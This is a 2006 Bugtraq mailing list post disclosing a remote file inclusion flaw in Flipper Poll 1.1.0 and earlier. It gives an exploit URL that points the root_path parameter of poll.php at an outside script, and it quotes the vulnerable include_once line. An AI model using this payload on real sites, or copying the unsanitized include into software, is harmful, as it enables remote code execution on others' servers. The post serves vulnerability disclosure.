Home page logo
/

bugtraq logo Bugtraq mailing list archives

Flipper Poll <= 1.1.0 Remote File Inclusion Vulnerability
From: x0r0n () hotmail com
Date: 13 Jul 2006 10:15:31 -0000

Flipper Poll <= 1.1.0 Remote File Inclusion Vulnerability

------------------------------------------


Discoverd By: XORON

------------------------------------------


cont () ct: x0r0n[at]hotmail[dot]com

------------------------------------------


Exploit: http://sitename.com/[path]/poll.php?root_path=evil_script?

------------------------------------------

Code: include_once($root_path . 'config.php');

------------------------------------------

# XORON - WWW.CYBER-WARRIOR.ORG -


  By Date           By Thread  

Current thread:
  • Flipper Poll <= 1.1.0 Remote File Inclusion Vulnerability x0r0n (Jul 13)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]